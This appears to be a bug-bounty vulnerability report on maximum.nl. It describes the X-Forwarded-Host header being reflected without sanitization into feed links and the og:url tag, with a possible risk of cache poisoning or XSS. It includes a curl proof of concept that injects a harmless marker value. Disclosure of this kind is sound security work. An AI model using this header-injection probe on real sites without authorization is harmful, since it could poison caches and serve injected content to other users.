'X-Forwarded-Host' key used in input without sanitation - possible cache poisoning

**Domain and URL:** maximum.nl **Summary:** The HTTP 'X-Forwarded-Host' is dynamically used in the application without sanitization, allowing an attacker control of the input key. This can allow for self-XSS, or when a CDN or caching service is deployed, risk the CDN caching the request and serving the injected payload to other users. PoC: ```$ curl -v https://www.maximum.nl/ -H 'X-Forwarded-Host: exampleinject' 2>&1 | grep 'exampleinject' <link rel="alternate" hreflang="nl" type="application/atom+xml" href="https://exampleinject/feed-page" title="Page Feed"> <link rel="alternate" hreflang="nl" type="application/atom+xml" href="https://exampleinject/feed-vacancy" title="Vacancy Feed"> <meta property="og:url" content="https://exampleinject" /> ``` Here my input is returned in the web applications response. When cached this it will return to other users. ## Steps To Reproduce: See PoC ## Impact Injected response being returned to users